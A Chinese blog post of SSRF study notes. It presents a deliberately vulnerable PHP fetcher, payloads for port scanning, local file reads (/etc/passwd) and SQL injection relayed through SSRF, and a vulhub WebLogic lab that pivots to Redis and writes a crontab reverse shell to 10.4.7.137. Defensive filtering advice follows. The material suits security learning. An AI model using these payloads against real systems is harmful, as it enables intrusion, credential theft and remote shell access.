ssrf学习笔记总结

最新推荐文章于 2025-05-20 03:39:43 发布
最新推荐文章于 2025-05-20 03:39:43 发布
阅读量322 收藏
点赞数
文章标签: 学习 笔记 web安全 安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_58683895/article/details/134466009
版权

SSRF概述

​ 服务器会根据用户提交的URL 发送一个HTTP 请求。使用用户指定的URL,Web 应用可以获取图片或者文件资源等。典型的例子是百度识图功能。

​ 如果没有对用户提交URL 和远端服务器所返回的信息做合适的验证或过滤,就有可能存在“请求伪造”的缺陷。“请求伪造”,顾名思义,攻击者伪造正常的请求,以达到攻击的目的。如果“请求伪造”发生在服务器端,那这个漏洞就叫做“服务器端请求伪造”,英文名字Server Side Request Forgery,简称SSRF。

​ SSRF 是一种由攻击者发起的伪造服务器发送的请求的一种攻击。

SSRF 场景

php实现

利用curl 实现,需要PHP 扩展组件curl 支持。

// ssrf_curl.php
if(isset($_REQUEST['url'])){
     $link = $_REQUEST['url'];
     $fileName = './curled/'.time().".txt";
     $curlObj = curl_init($link);
     $fp = fopen($fileName,'w');

     curl_setopt($curlObj,CURLOPT_FILE,$fp);
     curl_setopt($curlObj,CURLOPT_HEADER,0);
     curl_setopt($curlObj,CURLOPT_FOLLOWLOCATION,TRUE);

     curl_exec($curlObj);
     curl_close($curlObj);
     fclose($fp);

     if(getimagesize($fileName)){
     header("Content-Type:image/png");
     }
      $fp = fopen($fileName,'r');
     $result = fread($fp,filesize($fileName));
     fclose($fp);
     echo $result;
}else{
 echo "?url=[url]";
}

SSRF 原理

服务器接受了来自于客户端的URL 地址,并由服务器发送该URL 请求。

对用户输入的URL 没有进行恰当的过滤,导致任意URL 输入。

没对响应的结果进行检验,直接输出。

SSRF危害

  • 端口扫描;

  • 内网Web 应用指纹识别;

  • 攻击内网应用;

  • 读取本地文件;

SSRF攻防

SSRF利用

文件访问

?url=http://www.baidu.com
?url=http://www.baidu.com/img/bd_logo.png
?url=http://www.baidu.com/robots.txt

端口扫描

?url=http://127.0.0.1:80
?url=http://127.0.0.1:3306
?url=dict://127.0.0.1:3306
?url=http://10.10.10.1:22
?url=http://10.10.10.1:6379

读取本地文件

?url=file:///c:/windows/system32/drivers/etc/hosts
?url=file:///etc/passwd
?url=file:/c:/www/ssrf/ssrf_curl.php

内网应用指纹识别

有些应用是部署在内网的。

<Directory "c:\www\phpMyAdmin">
 #Order allow,deny
 Order deny,allow
 deny from all
 allow from 127.0.0.1
</Directory>

内网应用指纹识别

?url=http://127.0.0.1/phpmyadmin/readme

攻击内网web应用

内网安全通常都很薄弱。

<Directory "c:\www\cms">
 #Order allow,deny
 Order deny,allow
 deny from all
 allow from 127.0.0.1
</Directory>

通过SSRF 漏洞可以实现对内网的访问,从而可以攻击内网应用。仅仅通过GET 方法可以攻击的内网Web 应用有很多。

?url=http://127.0.0.1/cms/show.php?
id=-33/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,concat(username,0x3a,password),12,13,14,15/**/from/**/cms_
users
?url=http://127.0.0.1/cms/show.php?
id=-33%25%32%30union%25%32%30select%25%32%301,2,3,4,5,6,7,8,9,10,concat(username,0x3a,password),12,13,14,15%25%32
%30from%25%32%30cms_users

SSRF实例

https://vulhub.org/#/environments/weblogic/ssrf/

判断ssrf漏洞

访问

http://10.4.7.137:7001/uddiexplorer/

image-20231117144443232

漏洞存在于http://10.4.7.137:7001/uddiexplorer/SearchPublicRegistries.jsp

提交搜索并抓包

将此处url解码

image-20231117150146479

点击send发送

获取response,然后右键response发送给compare

image-20231117150311468

然后将url修改为百度,再次重复操作

image-20231117151225241

修改url后伪造服务器请求资源,并且收到response,即存在ssrf

探查内网端口开放情况

端口开放时,会返回404相关错误,虽然没有目录,但是能访问服务器

image-20231117151545430

使用localhost也可以

image-20231117151659744

端口未开放时则返回无法连接类错误

image-20231117151838296

探查内网ip

由于已知7001端口开放,因此可以用该端口探测内网中存活的ip

不存在时即返回无法连接

image-20231117152133486

探测内网地址可以使用爆破

从ssrf利用到redis未授权访问

由于这是容器,看一下redis的端口

image-20231117152730010

docker环境的网段一般是172

此处直接看一下配置文件看看ip

sudo docker ps -a

image-20231117160254922

sudo docker exec -it 8 /bin/bash

这个就是ip

image-20231117160340335

验证一下开放没

image-20231117160553260

发现开放

从redis未授权访问到getshell

将脚本写进去

set 1 "\n\n\n\n* * * * * root bash -c sh -i >& /dev/tcp/10.4.7.137/777 0>&1\n\n\n\n"
config set dir /etc/
config set dbfilename crontab
save
aaa

圈圈的地方要修改监听ip和监听端口

image-20231117161732114

将脚本文件url编码send,等待一会收到shell

image-20231117161645983

image-20231117161602941

SSRF防御

过滤输入

  • 限制协议,仅允许 http 或 https 协议;(防止使用gopher协议)

  • 限制IP,避免应用被用来获取内网数据,攻击内网;

  • 限制端口,限制请求端口为常用端口。

过滤输出

  • 过滤返回信息,只要不符合要求的,全部过滤;

  • 统一错误信息,让攻击无法对内网信息进行判断。

SSRF挖掘

web功能url关键字
分享
转码服务
在线翻译
图片加载与下载
图片、文章收藏功能
未公开的API实现
share
wap
url
link
src
source
target
u
3g
display
sourceURL
imageURL
domain
order libra
关注
网安工具系列(仅供参考):学习笔记-nuclei
weixin_54626591的博客
04-17 312
学习笔记-nuclei
SSRF学习笔记
星落
11-10 635
小谈SSRF(服务端请求伪造)
ssrf学习笔记(网上资源总结以及代码解释)
fresh_fistpupiu的博客
01-26 1007
SSRF(Server-Side Request Forgery:服务器端请求伪造)一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF是要目标网站的内部系统。(因为他是从内部系统访问的,所以可以通过它攻击外网无法访问的内部系统,也就是把目标网站当中间人)
SSRF漏洞-学习笔记
小龙在线
08-21 333
简介 SSRF(Server Side Request Forgery)即服务器端请求伪造,利用漏洞伪造服务器端发起请求,从而突破客户端获取不到数据限制,本质上是属于信息泄露漏洞。 通俗来说,就是利用服务器做代理,流量从服务器上中转。而这个转发流量的功能,存在漏洞,从而绕过防火墙访问内部网络。 漏洞场景 SSRF 形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制 。比如从指定URL地址获取网页文本内容,加载指定地址的图片,下载等等,而且在大部分的web服务器架构中,
CTF学习笔记Web
lt714739295的博客
12-26 883
代码示例。
学习笔记-java代码审计-ssrf
人饭子的博客
11-13 470
java代码审计-ssrf 0x01 漏洞挖掘 java发送http请求的方式还是比较多的,下面是原生的: String url = request.getParameter("url"); URL u = new URL(url); //1.URL,直接打开,可以跨协议 InputStream inputStream = u.openStream(); //2. URLConnection...
ssrf总结
weixin_44576725的博客
05-01 2352
SSRF总结 简介 服务端请求伪造(Server Side Request Forgery, SSRF)指的是攻击者在未能取得服务器所有权限时,利用服务器漏洞以服务器的身份发送一条构造好的请求给服务器所在内网。SSRF攻击通常针对外部网络无法直接访问的内部系统。SSRF可以对外网、服务器所在内网、本地进行端口扫描,攻击运行在内网或本地的应用,或者利用File协议读取本地文件。 原理 SSRF漏洞形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。例如,黑客操作服务端从
No.28 笔记 | 反序列化漏洞学习总结
聚焦网络安全,以多元语言优势汲取知识,分享生动有趣的学习与技术心得。
12-25 969
序列化:将对象转换为字节流,便于在内存、文件、数据库中存储,保证对象完整性与可传递性。例如,把一个包含用户信息(姓名、年龄等)的对象序列化为字节流后,可以方便地进行存储或传输。反序列化:是序列化的逆过程,依据字节流中的对象状态及描述信息重建对象。比如,从存储介质中读取字节流并还原为原始对象。应用场景:广泛应用于远程和进程间通信(RPC/IPC)、连线协议、Web服务、消息代理、缓存/持久性存储区、数据库、缓存服务器、文件系统、HTTP cookie、HTML表单参数、API身份验证令牌等场景。
2024年Web安全学习路线总结!430页Web安全学习笔记(附PDF)_ctf web pdf(1)
2401_84281748的博客
05-05 1222
网络安全的范畴很大,相较于二进制安全等方向的高门槛、高要求,Web安全体系比较成熟,在现阶段来看,但凡有自己网站和安全需求的企业,就需要Web安全工程师,并且薪资十分可观,因此成为了不少朋友的主要发展方向。当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。
生命在于学习——SSRF漏洞
易水哲的博客
08-23 2755
本篇文章是关于SSRF学习笔记
XEE攻击学习笔记
Jason乐悠的博客
03-16 788
定义:XEE(XML External Entity Injection)即XML外部实体注入攻击,属于XML解析漏洞。当应用程序解析用户输入的XML数据时,未禁止外部实体加载,攻击者可注入恶意实体,导致文件读取、命令执行、内网探测等危害。漏洞触发条件Web应用接受XML格式的用户输入;XML解析器未禁用外部实体引用(如未配置安全策略)。XEE漏洞的危害性源于XML解析器的宽松配置,攻击者可利用其进行敏感数据泄露、内网渗透等高危操作。
SSRF攻击姿势汇总
CanMeng'Blog - 一个WEB安全渗透的技术爱好者
11-29 1446
前言 这是很早就整理的笔记,今天想起来发到博客上,还是要保持写文章总结的习惯啊。 最近笔者在看讲SSRF、protocol smuggle、HTTP request smuggle、SSO任意跳转,Url解析不一致导致的安全问题。一方面由衷地佩服演讲人的脑洞和安全功底,另外一方面又在笔者又在反思,如果是我,我会怎么去发现此类漏洞,解决方案又是什么。本文不同于各大公众号千篇一律的复现、验证漏洞文章,会加入自己的思考和心得。鉴于文章会存在一些敏感内容,笔者会本着在删除敏感内容的前提下,尽量让大家都能看懂的标准
"SSRF操作Redis主从复制写Webshell_R3start的实践与总结
但好在有实战操作来打发时间,也记录了不少笔记,学到了很多新的技巧。不过,在查资料的过程中,经常被复制粘贴的博客坑了一些坑,感觉真是令人沮丧。此外,还被域内的一些权限问题搞得头疼,像system、...
开源项目实战学习之YOLO11:12.1 ultralytics-models-sam-blocks.py源码
kngines
05-17 254
开源项目实战学习之YOLO11:12.1 ultralytics-models-sam-blocks.py源码
学习笔记(C++篇)—— Day 6
2406_83392683的博客
05-17 1024
int main()//申请空间//申请空间+构造函数//只释放空间free(p1);//析构函数 + 释放空间delete p2;delete p3;return 0;注意:在申请自定义类型的空间时,new会调用构造函数,delete会调用析构函数,而malloc与free不会。由于C++的这些用法,用C++写链表会使得过程更加简便。
Adobe Illustrator学习备忘
sdaujz的博客
05-17 554
1.移动对象:需按住空格键加鼠标一块才能拖动。
广域网学习
2301_81350613的博客
05-18 876
可以使以太网网络中的多台主机连接到远端的宽带接入服务器。配置本地作为被认证方,以及账号密码信息。功能和指定对端用户名,必须与对端配置的。帧封装到以太网帧中的链路层协议。用户名一致,该名称对端可不设置。提供接入控制、认证等功能。,使内部用户可以上网。
AM32电调学习解读五:tenKhzRoutine
hyhsandy1803的博客
05-18 366
最近在学习AM32电调的2.18版本的源码,我用的硬件是AT32F421,整理了部分流程处理,内容的颗粒度是按自己的需要整理的,发出来给有需要的人参考。按自己的理解整理的,技术能力有限,可能理解有误,欢迎纠正。​注:lida2003博主是个大牛。写的无刷电调的理论和AM32相关知识点介绍的比较系统,介绍的很详细,有需要的同学可以去参考。我对电调这块是外行,只是刚入门学习。这里重点是代码理解的整理分析,他哪里写了很多原理性的知识。
强化学习系列——时序差分学习(SARSA与Q-Learning)
最新发布
qq_36892712的博客
05-20 700
强化学习环境一般建模为一个马尔可夫决策过程(MDP)SAPRγSAPRγSS:状态空间AA:动作空间Ps′∣saP(s'|s,a)Ps′∣sa:状态转移概率RsaR(s,a)Rsa:奖励函数γ∈01γ∈01:折扣因子目标是学习一个策略π\piπ下的状态值函数或状态-动作值函数:VπsEπ∑t0∞γtRt1∣S0sVπsEπ​t0∑∞​γtRt1。
ctfhub SSRF
08-27
ctfhub是一个CTF训练平台,提供了多个CTF挑战模块,其中包括了SSRF模块。SSRF(Server-Side Request Forgery)是一种攻击技术,可以利用服务器端请求伪造漏洞来发送恶意请求。在ctfhub的SSRF模块中,你可以学习和实践SSRF攻击技术,并利用平台上提供的漏洞来进行实验。 在SSRF中,有一个重要的点是请求可能会跟随302跳转。你可以尝试利用这个来绕过对IP的检测,访问位于127.0.0.1的flag.php文件,从而获取敏感信息。 此外,在SSRF中还可以使用Gopher协议来攻击内网的服务,例如Redis、Mysql、FastCGI、Ftp等等,并发送GET和POST请求。Gopher协议可以说是SSRF中的万金油,大大拓宽了SSRF的攻击面。你可以构造类似于"/?url=file:///var/www/html/flag.php"的本地地址来尝试攻击。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [network-security:学习web安全练习的靶场,以及总结的思维导图和笔记](https://download.youkuaiyun.com/download/weixin_42118423/15763452)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [CTFHub—SSRF](https://blog.youkuaiyun.com/qq_45927819/article/details/123400074)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [CTFHUB--SSRF详解](https://blog.youkuaiyun.com/qq_49422880/article/details/117166929)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值